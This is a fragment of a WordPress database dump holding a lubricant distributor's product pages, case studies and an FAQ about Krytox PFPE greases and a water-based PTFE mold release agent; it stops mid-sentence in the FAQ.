INSERT INTO `wp_posts` VALUES (2306, 2, '2016-10-06 13:32:46', '2016-10-06 13:32:46', '', 'Valve Lubricants', '', 'inherit', 'closed', 'closed', '', 'shutterstock_481449616', '', '', '2016-10-06 13:33:05', '2016-10-06 13:33:05', '', 2305, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_481449616.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2307, 2, '2016-10-06 13:36:01', '2016-10-06 13:36:01', '<strong>Smooth Operation in Extreme Temperatures and Longer Use-Life Make Krytox™ Valve Lubricants the Choice for Valve Seals</strong>\r\n\r\nControl valves are critical components in plant operations around the world. To optimize operational integrity, valves require proper maintenance. Long-lasting Krytox synthetic lubricants keep valves operating smoothly with less maintenance. Krytox oils and greases can also provide long-term corrosion resistance and enhanced performance, even in harsh environments, as well as extending the wear life of valve seals.\r\nHigh lubricity, perfluoropolyether- (PFPE-) based Krytox performance lubricants are chemically compatible with all seal materials typically used in industrial applications. The remarkable characteristics of Krytox performance lubricants include:\r\n<ul>\r\n 	<li>Compatible with most chemicals used in industrial applications</li>\r\n 	<li>Nontoxic, non-flammable</li>\r\n 	<li>Undamaged by—and non-reactive with—acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n 	<li>Minimal environmental footprint—chemically and biologically inert, and silicone-free</li>\r\n 	<li>Contain no volatile organic compound (VOC) materials or chlorine</li>\r\n</ul>\r\nKrytox lubricants provide smooth valve operation, less re-lubrication, and field-proven performance that can save you time and money. And, they are ideal for demanding conditions—high and low temperatures, extreme pressure, and harsh environments.\r\n\r\n<strong>Examples of Valve Lubricants and Valve-Related Applications</strong>\r\n<ul>\r\n 	<li>An American electricity generating company avoided costly shutdowns due to dried-out grease in its steam turbine governor control valves when they converted to Krytox XHT-BDZ grease; the switch also improved the reliability of supply to the electric grid and enhanced the bottom line.</li>\r\n 	<li>A Korean valve manufacturer was able to reduce damage claims to its pilot-type solenoid valves by applying Krytox GPL 103 oil grade to the solenoid coil in the assembly to reduce friction and heat, and coating the spools and seals with Krytox GPL 223 grease grade to resist degradation from water and oil.</li>\r\n 	<li>A South American manufacturer of big-bore engines used Krytox XP 2C5 grease grade to lubricate its EGR valves. The special additives in Krytox XP 2C5 prevent corrosion and allow free movement of the\r\nmetal-to-metal mechanism; the grease is inert to nitrous oxide gas and withstands temperatures up to 160 ºC (320 ºF).</li>\r\n 	<li>A French airport authority using Krytox XP 2A3 and XP 2A5 grease grades was able to achieve annual savings of €15,000 to 20,000 on the maintenance of its jet fuel pipeline by reducing scheduled maintenance to every 30 months instead of every four to six months—and unscheduled shutdowns due to valve failures were eliminated.</li>\r\n 	<li>A German manufacturer of gear-operated exhaust gas recirculation (EGR) valves for the automotive industry reduced failures due to excessive separation of grease and oil that were occurring at low temperatures and heavy vibrations. Switching to Krytox GPL 216 grease grade, the manufacturer was able to improve the reliability of its EGR valves and estimates that it is saving €80,000 ($100,000+) annually.</li>\r\n 	<li>For a steam control valve application at an Icelandic power plant, standard hydrocarbon-based grease proved unsatisfactory for lubricating bushings for valves that control the flow of high-temperature steam\r\ncontaining corrosive geothermal gases. The optimum lubricant would need to withstand the acidic gases and have low friction for accurate control of the valve position, as well as be capable of performing in a selfgreasing system. Krytox GPL 206 grease met the challenge for lubrication of the steam valve bushing, providing the low static friction and no stick-slip that is required for accurate position control.</li>\r\n</ul>\r\nTo learn more about Valve Lubricants and Krytox please <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here.</a>\r\n\r\n&nbsp;', 'Krytox Valve Lubricants', '', 'inherit', 'closed', 'closed', '', '2305-revision-v1', '', '', '2016-10-06 13:36:01', '2016-10-06 13:36:01', '', 2305, 'https://www.miller-stephenson.com/2305-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2308, 2, '2016-10-06 13:54:03', '2016-10-06 13:54:03', '<h1><span style="font-size: 120%;"><strong>Krytox Corrugator Greases</strong></span></h1>\n<h4><strong>Product Information</strong></h4>\n<p>Krytox PFPE/PTFE corrugator greases have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Krytox lubricants help eliminate bearing lubrication as a cause of premature corrugator roll failures. Corrugator roll changes are significantly easier and quicker on single facers lubricated with Krytox corrugator greases.</p>\n<h4><strong>Corrugators choose Krytox™ lubricants for many reasons:</strong></h4>\n<ul>\n<li>Most productive lubrication system for single facer bearings among all paper corrugating plants, equipment OEMs, and corrugator roll rebuilders</li>\n<li>Most thermally stable H1 base oil available</li>\n<li>Reduced risk of bearing failure</li>\n<li>Conversion support and PFPE lubrication/application training available</li>\n</ul>\n<p>Krytox greases for the corrugating industry include:</p>\n<p><strong>Krytox Corrugator <a href="https://www.miller-stephenson.com/product/krytox-226-fg/">226 FG</a>, <a href="https://www.miller-stephenson.com/product/krytox-227-fg/">227 FG</a> Greases</strong>—The standard in PFPE/PTFE greases, recognized by OEMs and operators alike as the premium performing high temperature grease. These products are NSF H-1 Food Grade certified, providing safe, non-toxic, and inert performance in food-related operations.</p>\n<h4><strong>Safe Handling</strong></h4>\n<p>For detailed information, refer to the MSDS for the specific grade of Krytox fluorinated grease that you are using. Highlights are:</p>\n<ul>\n<li>When handling, wear any type of impervious gloves.</li>\n<li>Wash hands after use.</li>\n<li>Do not smoke tobacco that may have been contaminated with Krytox grease. Inhalation of fumes from burning Krytox grease may cause a temporary flu-like illness with symptoms such as fever, chills, and sometimes cough. Symptoms are typically gone after 1–2 days.</li>\n<li>When handling Krytox solvent or HC cleaner, use adequate ventilation, and wear eye protection and any type of impervious rubber gloves.</li>\n</ul>\n<h4><strong>Key Points</strong></h4>\n<ul>\n<li>Make sure the bearings are clean and free of preservatives, hydrocarbon oils, greases, and residues before lubricating with Krytox grease; use Krytox HC Plus Cleaner or equivalent. Contaminating Krytox grease with any other lubricant will impair its lubricating value.</li>\n<li>If using pails versus cartridges, slight pooling of oil on top of the Krytox grease can occur, particularly if it has been sitting unused for a while. Simply mix it back in with a clean stirrer.</li>\n<li>Use special grease fittings—pin or button head—for Krytox grease to prevent contamination with hydrocarbon or synthetic lubricants.</li>\n<li>Use a dedicated grease gun (labeled Krytox grease only) with a swivel coupling matched to the special pin or button head grease fittings (bearing inlet ports). Fill the bearings and bearing housings completely to prevent air pockets that can collect water and debris.</li>\n<li>Prevent corrugating process materials (e.g., waxes and paper debris) from entering the bearings.</li>\n</ul>\n<h4><strong>Relubrication</strong></h4>\n<ul>\n<li>Wipe the inlet fittings clean with a clean cloth to prevent contamination of the Krytox grease.</li>\n<li>Add/replenish Krytox™ grease every three months. Pump about 1 lb (1/2 cartridge), or whatever is necessary, of Krytox™ grease into the bearing button or pin head grease fittings to force some existing grease out through the seals. It is best to rotate bearings while adding grease to prevent “channeling” of the new grease through the bearing. A more conservative approach is to follow this practice more frequently, say once a month; proportionately less Krytox grease would be needed. Pay attention to plant safety procedures when working with moving equipment.</li>\n<li>Compare expelled/purged grease with the “Color Guide” and service as noted. (This guide applies to normal wear only; contaminants will alter the grease’s appearance.)</li>\n<li>Wipe off excess Krytox grease from equipment surfaces to prevent buildup of dirt/debris attracted to surface grease.</li>\n</ul>\n<h4><strong>Disposal and Storage</strong></h4>\n<ul>\n<li>Properly dispose of used Krytox grease purged from outlet ports, seals, and/or shaft-bearing clearances according to local, state, and federal codes.</li>\n<li>Keep all Krytox grease containers covered to prevent contamination.</li>\n</ul>\n<p>&nbsp;</p>\n<table width="1153">\n<tbody>\n<tr>\n<td width="223"><strong>Color Guide</strong></td>\n<td width="242"></td>\n<td width="688"></td>\n</tr>\n<tr>\n<td><strong>Color</strong></td>\n<td><strong>Contamination</strong></td>\n<td><strong>Recommendation</strong></td>\n</tr>\n<tr>\n<td>White</td>\n<td>None</td>\n<td>Grease in good condition: creamy consistency.</td>\n</tr>\n<tr>\n<td>Gray</td>\n<td>0.0-0.1% iron</td>\n<td>Grease in good condition, normal wear in bearing; creamy consistency</td>\n</tr>\n<tr>\n<td>Tan</td>\n<td>0.0-0.4% iron</td>\n<td>Add grease until cavity is full, bearing OK.</td>\n</tr>\n<tr>\n<td>Brown</td>\n<td>0.0-0.8% iron</td>\n<td>Flush bearing with grease until color lightens to tan.</td>\n</tr>\n<tr>\n<td>Dark Brown</td>\n<td>Greater than 0.8% iron</td>\n<td>Check bearing for play and noise. If OK, flush/purge with new Krytox™ grease. If not OK, schedule bearing change.</td>\n</tr>\n<tr>\n<td>Black</td>\n<td></td>\n<td>Replace bearing.</td>\n</tr>\n</tbody>\n</table>\n[ux_product_categories ids="143" number="10"]\n\n<p>To learn more about Krytox corrugator greases please <a href="https://www.miller-stephenson.com/contact/">contact us by clicking here.</a></p>', 'Krytox Corrugator Greases', '', 'publish', 'closed', 'closed', '', 'krytox-corrugator-greases', '', '', '2016-10-25 17:49:11', '2016-10-25 17:49:11', '', 0, 'https://www.miller-stephenson.com/?p=2308', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2309, 2, '2016-10-06 13:51:09', '2016-10-06 13:51:09', '', 'Corrugator Greases', '', 'inherit', 'closed', 'closed', '', 'shutterstock_373451452', '', '', '2016-10-06 13:51:22', '2016-10-06 13:51:22', '', 2308, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_373451452.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2310, 2, '2016-10-06 13:54:03', '2016-10-06 13:54:03', '<span style="font-size: 120%;"><strong>Krytox Corrugator Greases</strong></span>\r\n\r\n<strong>Product Information</strong>\r\n\r\nKrytox PFPE/PTFE corrugator greases have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Krytox lubricants help eliminate bearing lubrication as a cause of premature corrugator roll failures. Corrugator roll changes are significantly easier and quicker on single facers lubricated with Krytox corrugator greases.\r\n\r\n<strong>Corrugators choose Krytox™ lubricants for many reasons:</strong>\r\n<ul>\r\n 	<li>Most productive lubrication system for single facer bearings among all paper corrugating plants, equipment OEMs, and corrugator roll rebuilders</li>\r\n 	<li>Most thermally stable H1 base oil available</li>\r\n 	<li>Reduced risk of bearing failure</li>\r\n 	<li>Conversion support and PFPE lubrication/application training available</li>\r\n</ul>\r\nKrytox greases for the corrugating industry include:\r\n\r\n<strong>Krytox Corrugator 226 FG, 227 FG Greases</strong>—The standard in PFPE/PTFE greases, recognized by OEMs and operators alike as the premium performing high temperature grease. These products are NSF H-1 Food Grade certified, providing safe, non-toxic, and inert performance in food-related operations.\r\n\r\n<strong>Safe Handling</strong>\r\n\r\nFor detailed information, refer to the MSDS for the specific grade of Krytox fluorinated grease that you are using. Highlights are:\r\n<ul>\r\n 	<li>When handling, wear any type of impervious gloves.</li>\r\n 	<li>Wash hands after use.</li>\r\n 	<li>Do not smoke tobacco that may have been contaminated with Krytox grease. Inhalation of fumes from burning Krytox grease may cause a temporary flu-like illness with symptoms such as fever, chills, and sometimes cough. Symptoms are typically gone after 1–2 days.</li>\r\n 	<li>When handling Krytox solvent or HC cleaner, use adequate ventilation, and wear eye protection and any type of impervious rubber gloves.</li>\r\n</ul>\r\n<strong>Key Points</strong>\r\n<ul>\r\n 	<li>Make sure the bearings are clean and free of preservatives, hydrocarbon oils, greases, and residues before lubricating with Krytox grease; use Krytox HC Plus Cleaner or equivalent. Contaminating Krytox grease with any other lubricant will impair its lubricating value.</li>\r\n 	<li>If using pails versus cartridges, slight pooling of oil on top of the Krytox grease can occur, particularly if it has been sitting unused for a while. Simply mix it back in with a clean stirrer.</li>\r\n 	<li>Use special grease fittings—pin or button head—for Krytox grease to prevent contamination with hydrocarbon or synthetic lubricants.</li>\r\n 	<li>Use a dedicated grease gun (labeled Krytox grease only) with a swivel coupling matched to the special pin or button head grease fittings (bearing inlet ports). Fill the bearings and bearing housings completely to prevent air pockets that can collect water and debris.</li>\r\n 	<li>Prevent corrugating process materials (e.g., waxes and paper debris) from entering the bearings.</li>\r\n</ul>\r\n<strong>Relubrication</strong>\r\n<ul>\r\n 	<li>Wipe the inlet fittings clean with a clean cloth to prevent contamination of the Krytox grease.</li>\r\n 	<li>Add/replenish Krytox™ grease every three months. Pump about 1 lb (1/2 cartridge), or whatever is necessary, of Krytox™ grease into the bearing button or pin head grease fittings to force some existing grease out through the seals. It is best to rotate bearings while adding grease to prevent “channeling” of the new grease through the bearing. A more conservative approach is to follow this practice more frequently, say once a month; proportionately less Krytox grease would be needed. Pay attention to plant safety procedures when working with moving equipment.</li>\r\n 	<li>Compare expelled/purged grease with the “Color Guide” and service as noted. (This guide applies to normal wear only; contaminants will alter the grease’s appearance.)</li>\r\n 	<li>Wipe off excess Krytox grease from equipment surfaces to prevent buildup of dirt/debris attracted to surface grease.</li>\r\n</ul>\r\n<strong>Disposal and Storage</strong>\r\n<ul>\r\n 	<li>Properly dispose of used Krytox grease purged from outlet ports, seals, and/or shaft-bearing clearances according to local, state, and federal codes.</li>\r\n 	<li>Keep all Krytox grease containers covered to prevent contamination.</li>\r\n</ul>\r\n&nbsp;\r\n<table width="1153">\r\n<tbody>\r\n<tr>\r\n<td width="223"><strong>Color Guide</strong></td>\r\n<td width="242"></td>\r\n<td width="688"></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Color</strong></td>\r\n<td><strong>Contamination</strong></td>\r\n<td><strong>Recommendation</strong></td>\r\n</tr>\r\n<tr>\r\n<td>White</td>\r\n<td>None</td>\r\n<td>Grease in good condition: creamy consistency.</td>\r\n</tr>\r\n<tr>\r\n<td>Gray</td>\r\n<td>0.0-0.1% iron</td>\r\n<td>Grease in good condition, normal wear in bearing; creamy consistency</td>\r\n</tr>\r\n<tr>\r\n<td>Tan</td>\r\n<td>0.0-0.4% iron</td>\r\n<td>Add grease until cavity is full, bearing OK.</td>\r\n</tr>\r\n<tr>\r\n<td>Brown</td>\r\n<td>0.0-0.8% iron</td>\r\n<td>Flush bearing with grease until color lightens to tan.</td>\r\n</tr>\r\n<tr>\r\n<td>Dark Brown</td>\r\n<td>Greater than 0.8% iron</td>\r\n<td>Check bearing for play and noise. If OK, flush/purge with new Krytox™ grease. If not OK, schedule bearing change.</td>\r\n</tr>\r\n<tr>\r\n<td>Black</td>\r\n<td></td>\r\n<td>Replace bearing.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about Krytox corrugator greases please <a href="https://www.miller-stephenson.com/contact/">contact us by clicking here.</a>', 'Krytox Corrugator Greases', '', 'inherit', 'closed', 'closed', '', '2308-revision-v1', '', '', '2016-10-06 13:54:03', '2016-10-06 13:54:03', '', 2308, 'https://www.miller-stephenson.com/2308-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2311, 2, '2016-10-06 14:17:55', '2016-10-06 14:17:55', '<strong>Krytox AGL 683 Aviation Gear Box Grease - Case Study</strong>\r\n\r\n<strong>Aircraft Cabin Air Conditioning and Temperature Control System Application</strong>\r\n\r\nAircraft systems manufacturer improves flying experience with help from custom lubricant.\r\n\r\n<strong>Aircraft systems manufacturer makes cabins more comfortable and reduces costly maintenance</strong>\r\n\r\nA systems manufacturer designed a cabin air conditioning and temperature control system for the latest series of large passenger aircraft that makes flying a more comfortable experience for passengers and flight crews. Compared to traditional systems, the new system provides higher humidity, improved air quality, lower cabin pressure, and less noise in the cabin.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe manufacturer needed a lubricant that could meet the demanding requirements of the electromechanical actuator gearbox in the control system. Specifically, the lubricant had to provide superior lubricity over an operating temperature ranging from –55–100 °C (–67–212 °F) and perform with very limited torque. In addition, the gearbox was required to operate for extended periods of time without re-lubrication.\r\n\r\n<strong>The Solution</strong>\r\n\r\nChemours developed a new product specifically designed to meet the needs of the electro-mechanical actuator gearbox. Krytox AGL 683 grease can withstand the temperature extremes of the application and provide the lowest possible torque while delivering exceptional lubricity.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox AGL 683 lubricant, the aircraft systems manufacturer was able to extend lubrication intervals.</li>\r\n 	<li>Chemours has the knowledge to put science to work to develop a custom-designed lubricant that met the specific needs of this critical system.</li>\r\n 	<li>Krytox AGL 683 lubricant can be used for other electro-mechanical gearbox applications.</li>\r\n</ul>\r\n[product id="1072" columns="1"]\r\n\r\nTo learn more about Krytox AGL 683, please <a href="https://www.miller-stephenson.com/product/agl-683/">click here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox AGL 683 Case Study - Gearbox Grease', '', 'publish', 'closed', 'closed', '', 'krytox-agl-683-gearbox-grease', '', '', '2016-10-12 19:54:59', '2016-10-12 19:54:59', '', 0, 'https://www.miller-stephenson.com/?p=2311', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2312, 3, '2016-10-06 14:49:49', '2016-10-06 14:49:49', '<h2>MS-145W | Water-based Mold Release Agents</h2>\r\n<h3>Sub-micron PTFE; Exceptional Release Properties; No Transfer</h3>\r\nMiller-Stephenson\'s PTFE Water-based Mold Release Agents MS-145W,  utilizes sub 1.0 micron PTFE (polytetrafluoroethylene) particles to impart superior lubricity, surface adhesion and durability, and outstanding mold release efficiency. The unmatched lubricity and extremely low coefficient of friction has been optimized for hot mold application (&gt;190 F / 88 C). The formulation has been further enhanced with proprietary surface activation chemistry to increase adhesion of the PTFE to the molding surface.  The result is a water-based release agent that is very cost-effective, maximizing releases per application and decreasing down-time. Benefits of this product include:\r\n<ul>\r\n 	<li>Water-based Release Agent ; Hot mold optimized</li>\r\n 	<li>Enhanced surface adhesion; Maximized durability</li>\r\n 	<li>Excellent release of all polymer types</li>\r\n 	<li>Non-flammable; No VOC; No GWP</li>\r\n</ul>\r\nMiller-Stephenson has been developing PTFE Water-based Mold Release Agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE Water-based Mold Release Agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics.\r\n\r\nProduction engineers will typically choose PTFE-based release agents if they are looking for a dry film, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates, specifically for rubber to metal bonding. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial-based alternatives.  Miller-Stephenson’s MS-145W and ReleaSys 8200 are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-145W | Water-based Mold Release Agents', 'Miller-Stephenson\'s PTFE release agent is a water-based formulation which utilizes sub 1.0 micron PTFE (polytetrafluoroethylene) particles to impart superior lubricity, surface adhesion and durability, and outstanding mold release efficiency. The outstanding lubricity and extremely low coefficient of friction of this water based PTFE has been optimized for hot mold application (&gt;190 F / 88 C). The formulation has been further enhanced with proprietary surface activation chemistry to increase adhesion of the PTFE to the molding surface.  The result is a water-based release agent that is very cost-effective by maximizing releases per application and decreasing down-time. Benefits of this product include:\r\n<ul>\r\n 	<li>Water-based formulation; Hot mold optimized</li>\r\n 	<li>Enhanced surface adhesion; Maximized durability</li>\r\n 	<li>Excellent release of all polymer types</li>\r\n 	<li>Non-flammable; No VOC; No GWP</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'water-based-mold-release-agents', '', '', '2017-06-05 12:38:12', '2017-06-05 12:38:12', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2312', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2313, 2, '2016-10-06 14:06:52', '2016-10-06 14:06:52', '', 'Krytox AGL 683', '', 'inherit', 'closed', 'closed', '', 'shutterstock_319726019', '', '', '2016-10-06 14:12:23', '2016-10-06 14:12:23', '', 2311, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_319726019.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2314, 2, '2016-10-06 14:17:55', '2016-10-06 14:17:55', '<strong>Krytox AGL 683 Aviation Gear Box Grease - Case Study</strong>\r\n\r\n<strong>Aircraft Cabin Air Conditioning and Temperature Control System Application</strong>\r\n\r\nAircraft systems manufacturer improves flying experience with help from custom lubricant.\r\n\r\n<strong>Aircraft systems manufacturer makes cabins more comfortable and reduces costly maintenance</strong>\r\n\r\nA systems manufacturer designed a cabin air conditioning and temperature control system for the latest series of large passenger aircraft that makes flying a more comfortable experience for passengers and flight crews. Compared to traditional systems, the new system provides higher humidity, improved air quality, lower cabin pressure, and less noise in the cabin.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe manufacturer needed a lubricant that could meet the demanding requirements of the electromechanical actuator gearbox in the control system. Specifically, the lubricant had to provide superior lubricity over an operating temperature ranging from –55–100 °C (–67–212 °F) and perform with very limited torque. In addition, the gearbox was required to operate for extended periods of time without re-lubrication.\r\n\r\n<strong>The Solution</strong>\r\n\r\nChemours developed a new product specifically designed to meet the needs of the electro-mechanical actuator gearbox. Krytox AGL 683 grease can withstand the temperature extremes of the application and provide the lowest possible torque while delivering exceptional lubricity.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox AGL 683 lubricant, the aircraft systems manufacturer was able to extend lubrication intervals.</li>\r\n 	<li>Chemours has the knowledge to put science to work to develop a custom-designed lubricant that met the specific needs of this critical system.</li>\r\n 	<li>Krytox AGL 683 lubricant can be used for other electro-mechanical gearbox applications.</li>\r\n</ul>\r\nTo learn more about Krytox AGL 683, please <a href="https://www.miller-stephenson.com/product/agl-683/">click here.</a>\r\n\r\n&nbsp;', 'Krytox AGL 683 Case Study - Gearbox Grease', '', 'inherit', 'closed', 'closed', '', '2311-revision-v1', '', '', '2016-10-06 14:17:55', '2016-10-06 14:17:55', '', 2311, 'https://www.miller-stephenson.com/2311-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2315, 2, '2016-10-06 14:47:03', '2016-10-06 14:47:03', '<span style="font-size: 120%;"><strong>Krytox FAQ</strong></span>\r\n\r\n<span style="font-size: 110%;"><strong>Introduction to Krytox Lubricants</strong></span>\r\n\r\n<strong>What is Krytox FAQ?</strong>\r\n\r\nKrytox is the Chemours brand name for a range of clean, specialty synthetic lubricating materials available in numerous grades for a wide range of applications. Krytox lubricants have become the product of choice where extremely high or low temperature performance, nonflammability, oxygen compatibility, and resistance to aggressive chemicals are required. In this Krytox FAQ we discuss all the uses, applications and specifications of Krytox.\r\n\r\n<strong>What are the primary differences in Krytox oils?</strong>\r\n<ul>\r\n 	<li>Krytox XHT oils have additional treatment to make them more thermally stable at temperatures over 300 °C (572 °F) and have very high viscosity to withstand the temperatures and provide adequate lubrication.</li>\r\n 	<li>Krytox aerospace oils have more strict volatility specifications and are a narrower distillation than GPL oils.</li>\r\n 	<li>Krytox vacuum pump fluids are distilled to give an excellent vapor pressure and are designed for specific OEM pumps.</li>\r\n 	<li>Krytox linear oils have a better viscosity index and operate over a wider temperature range.</li>\r\n 	<li>Krytox GPL oils are formulated to provide a cost effective base oil for industrial applications.</li>\r\n</ul>\r\n<strong>Does Krytox contain silicone?</strong>\r\n\r\nNo. Krytox oils and greases do not contain any silicones,and there are no silicones used in processing.\r\n\r\n<strong>What are the different grades of Krytox GPL lubricants and their typical applications?</strong>\r\n<ul>\r\n 	<li>The Krytox GPL 10X oil /20X grease series contain no additives and can be used on components that come in contact with most chemicals typically used in industry. Typical applications include valves or bearings, seal barrier fluids, instruments, and oxygen systems.</li>\r\n 	<li>The Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or extremely heavily loaded applications.</li>\r\n 	<li>The Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor; it also improves load carrying performance and is ideal for corrosive environments. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.</li>\r\n 	<li>The Krytox GPL 29X greases have EP and anticorrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection.</li>\r\n 	<li>The Krytox GPL 2EX lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anti-corrosion additive.</li>\r\n</ul>\r\n<strong>What is Krytox made of?</strong>\r\n\r\nKrytox fluorinated oils are a series of low molecular weight, fluorine end-capped, homopolymers of hexafluoropropylene epoxide. The polymer chain is completely saturated and contains only the elements carbon, oxygen, and fluorine; hydrogen is not present. On a weight basis, typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\n\r\n<span style="font-size: 110%;"><strong>Krytox FAQ Applications</strong></span>\r\n\r\n<strong>Where can Krytox lubricants be used?</strong>\r\n\r\nKrytox lubricants can be used in applications where nonflammability, oxygen compatibility, materials compatibility, high temperature stability, and resistance to aggressive chemicals are requirements. Some examples include:\r\n<ul>\r\n 	<li><strong>Automotive</strong>: Wheel bearing grease, CV joint grease, universal joint grease, fan clutch bearing grease, emission air pump grease, spark plug boot lubricant, weather stripping lubricant, sunroof seal lubricant, clutch throw out bearing grease, ABS system grease, paint plant conveyor bearings, paint spray system valve lubrication, gasoline pump bearings, windshield wiper motors, oil pressure sensors, truck window lift mechanism, sintered bearings in motors, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls</li>\r\n 	<li><strong>Aviation</strong>: Fuel resistant grease, oxygen compatible grease, ventilation fan bearing grease, cruise missile rear main bearing lubricant, starter bearing grease, emergency generator bearing grease, missile launch\r\nplatform gear lubricant, space shuttle lubricant, sealant</li>\r\n 	<li><strong>Pumps</strong>: Vacuum pump fluid for corrosive and hazardous service, bearing grease for chemical pumps, O-ring lubricant, barrier fluid between double mechanical seals • Industrial: Corrugator and paper machine bearings, aluminum can manufacturing bearings, vacuum sputtering machines, welding machines, gear oil, linear bearing lubricant, high temperature fans, clean rooms, chlorine service, textile equipment, tenter frames, high speed motors, instrument bearings, sealed-for-life motors, conveyor system in glass and aluminum plants, textile calender roll bearings, brick kiln car bearings, film blowing machines</li>\r\n 	<li><strong>Nuclear</strong>: Submerged sump pump bearings, containment cooling fans, snubbers, control rod drive mechanism fan motors</li>\r\n 	<li><strong>Valves</strong>: Lubricant for valve stem packing, relief valve lubricant, O-ring lubricant, steam turbine control valves, low emissions valve stem packing lubricant</li>\r\n 	<li><strong>Miscellaneous</strong>: Anti-seize lubricant, bolt thread lubricant, water purifier lubricant, self-contained breathing apparatus lubricant, cryogenic lubricant, vacuum system sealant, drive chains, hydraulic fluids, instrument barrier fluids, heat transfer fluids, geothermal system grease, mold release agent, fishing reel grease, industrial toast making oven conveyor bearings, windmill gearboxes, glove curing conveyor</li>\r\n</ul>\r\n<strong>What is the NLGI consistency of Krytox grease grades?</strong>\r\n\r\nGreases are formed by mixing the base oil with a thickener to form a grease. Krytox greases use a special high-thickening efficiency, low molecular weight polytetrafluoroethylene (PTFE) with very small particle sizes as their thickener. This is one of the most thermally stable thickeners for high-temperature, long-term greases. The higher thickening efficiency of the special PTFE thickener allows Chemours to formulate grease to\r\nmaximize oil content for improved grease performance.\r\nGreases can be formulated with different viscosity oils to handle different temperatures and load conditions. High viscosity oils can be used in greases for high temperatures, heavy loads, or low speed applications.\r\nLow viscosity oils can be used in greases where low temperature properties are important or speeds are higher. Lower amounts of thickener form softer or more fluid-like greases. Higher solid levels form harder, stiffer\r\ngreases. Additives are often added to the grease to enhance anti-corrosion protection, raise load carrying ability, or help reduce wear.\r\nOur standard grease grade is NLGI Grade 2; however, upon request, we produce NLGI Grades 000 through 6.\r\n\r\n<strong>Do I need to do anything special before using Krytox in bearings?</strong>\r\n\r\nBefore adding Krytox grease to a bearing, the bearing should be cleaned of all existing greases, oils, or preservative oils used during storage. If hydrocarbon oils are left in a bearing, the oils can form carbon deposits at high temperatures that may accelerate bearing failure. Please ask for “New Bearing Preparation with Krytox Lubricants” for the recommended cleaning and repacking procedure, as well as guidance on how much grease to use and speed considerations.\r\n\r\n<strong>Is ongoing lubrication required once we’ve begun using Krytox?</strong>\r\n\r\nRe-lubrication of bearings may be required: typically every 1–3 months for corrugators, depending on the equipment operating temperature. For other applications, re-lubrication intervals can be from months to years or\r\npotentially never in the case of sealed systems.\r\n\r\n<strong>Can I mix Krytox grease with other greases?</strong>\r\n\r\nThe performance benefits of Krytox grease will not be achieved if Krytox is mixed with a non-perfluoropolyether (PFPE) grease. The performance of the grease mixture will be limited by the properties of the non-PFPE grease in the mixture. Krytox grease will not react with the other grease, nor cause decomposition or any hazardous reactions. The mixing tests that Chemours has done have shown that the mixture sometimes softens up by about one penetration grade when it is heated up. This normally will not be enough change to cause any significant problems.\r\nThe Krytox grease will not stop the other lubricant from breaking down from heat and oxidation. It is likely that the additives in the hydrocarbon grease have coated the bearing surfaces, and the Krytox grease will not be able to adhere to the bearing—so most of it might get thrown out of the bearing.\r\n\r\n<span style="font-size: 110%;"><strong>Characteristics of Krytox FAQ</strong></span>\r\n\r\n<strong>What approvals and certifications do Krytox lubricants have?</strong>\r\n\r\nKrytox lubricants have the following certifications:\r\n<ul>\r\n 	<li>ISO 9001 Certified Quality Management System</li>\r\n 	<li>ISO 14001 Certified Environmental Management System</li>\r\n</ul>\r\nIn addition, certain grades have the following approvals:\r\n<ul>\r\n 	<li>MIL-Spec PRF-27617 approved grades for aerospace and aviation use</li>\r\n 	<li>NSF H-1 food grade lubricants approved for incidental food contact</li>\r\n 	<li>Independently tested and confirmed for LOX and GOX use by major oxygen manufacturers and certification authorities</li>\r\n</ul>\r\nAre Krytox lubricants flammable?\r\n\r\nNo. Krytox lubricants are 